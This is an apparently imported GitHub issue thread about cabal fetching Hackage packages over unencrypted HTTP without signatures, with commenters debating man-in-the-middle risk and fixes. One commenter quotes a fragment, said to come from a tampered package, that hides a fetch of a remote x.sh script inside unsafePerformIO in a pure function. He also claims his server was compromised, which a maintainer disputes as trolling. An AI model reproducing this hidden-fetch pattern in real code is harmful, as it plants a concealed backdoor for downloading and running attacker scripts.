Packages are downloaded insecurely

[bos]

(Imported from Trac #946, reported by cooldude on 2012-04-26)

It appears that when running cabal install package, the package is downloaded without any transport security.

Anyone who can perform a man in the middle attack could tamper with the package that is being downloaded, resulting in a complete compromise of the cabal user.

This makes it impossible to use cabal.

The servers should utilize TLS, it is possible to get a free certificate from startcom if price is a concern.

Additionally when packages are verified as non-malicious, they should be signed with a "cabal" signing key, and then the package signatures should be verified by cabal.

[hlem1]

Is anyone interested in having this one fixed? I actually had a problem with a corporate firewall, which returned a intranet-proxy-info-page instead of a proper failure code or the file. Cabal thought it was downloaded correctly and tried to install it,so even after fixing the proxy configuration the download had to be deleted manually (IIRC from the repo-cache).

I guess hackage would need to be changed to include check sums and/or be reachable via https as well, so maybe the whole change must be started there? Any thoughts on that?

[gregorycollins]

a) this isn't a bug, it's a feature request
b) this shouldn't be marked as urgent: obviously cabal is insecure and if you need to use it in a context where security would be important, you would audit the packages by hand and then pull them into a private build system or instance of the hackage server. Man in the middle attacks are much less of a problem than the other glaring security issues we have (lack of package signing and ability for anyone with a hackage account to push any package are much bigger ones.)

Modifying labels accordingly.

[9Z8LwVMdctC630D0gAWmmFHe1nR]

It would be nice if you could add a notice to the cabal homepage in big letters.
"Warning cabal is insecure software and should only be used in an isolated testing environment"

Additionally a warning message should be presented informing the user that they might compromise their system when downloading packages that the user must accept.

There is a big problem where developers of haskell applications are not aware or informing the users that they will get compromised by using cabal.

For example: http://www.yesodweb.com/page/quickstart

Perhaps the yesod developer just assumes that users following the instructions are only using it in an isolated testing environment, and will of course manually download and audit all the packages every time there is an update.

[9Z8LwVMdctC630D0gAWmmFHe1nR]

Just some references about what needs to be kept in mind when fixing cabal:

http://www.updateframework.com/projects/project
http://www.cs.arizona.edu/stork/packagemanagersecurity/

[23Skidoo]

Nice links, thanks.

[roger-bell]

Oh WTF. This probably explains how my server was compromised. I recently modified my code and added only one package, "naturals-0.2.0.2". I just fetched the code again right now and I see this in it:

natural :: Integer -> Natural
natural n | n < 0 = Indeterminate
natural n = f (Natural n)

f :: a -> a
f x = unsafePerformIO $ do
  let url = "http://*removed*/x.sh"
  -- ...
  return x

WTF dudes. This is haskell, I thought people knew what they're doing here. This is a HUGE BUG and should be fixed. I just trashed my server hardware and made an order for some fresh hardware.

[byorgey]

I took a look at the source code of the naturals-0.2.0.2 package and I don't see that code with unsafePerformIO anywhere. The naturals package was last uploaded in August 2011. Can you tell us exactly how you fetched the code?

Or are you claiming you were the target of a man-in-the-middle attack with a malicious party modifying the naturals package in transit from Hackage to you? I find that somewhat incredible, as the naturals package has zero reverse dependencies. Also, I have never heard of someone physically throwing away hardware after it was compromised. If you are that paranoid then you probably shouldn't be using software, period.

[byorgey]

OK, seriously? I call trolling. There have been two new github accounts made in the last week specifically to create and comment on these issues: @9Z8LwVMdctC630D0gAWmmFHe1nR and @roger-bell. No one is denying there are serious security flaws here which ought to be addressed, but creating throwaway accounts just to trump up some pet issue with implausible stories is simply trolling.

(Update: in a previous version of this comment I too hastily accused @klrr of creating those accounts -- but my only evidence for that was the similarity of the icons, which, it has been pointed out to me, are similar because they were auto-generated. Sorry about that.)

[funrep]

I don't own any fake account. My avatar is the default so of course it's similar to other ones who is also generated based on your name.

I accept your apologize on IRC, I just wanted to make it clear here that I'm not a troll of any kind.

[9Z8LwVMdctC630D0gAWmmFHe1nR]

@byorgey why do you think it is implausible? I don't think it is rare for people to use hostile networks, although I am rather surprised that somebody actually has been attacked this way, as the number of people who use cabal is rather small.

That said, there are toolkits to exploit these kind of vulnerabilities already, so perhaps someone has just written a cabal module for one of those toolkits, an open-source one for example:
https://github.com/infobyte/evilgrade

@roger-bell I would be interested if i can get the full url/code if you still have it?

[valpackett]

How to take over the computer of any Java (or Clojure or Scala) developer

Still no TLS in cabal?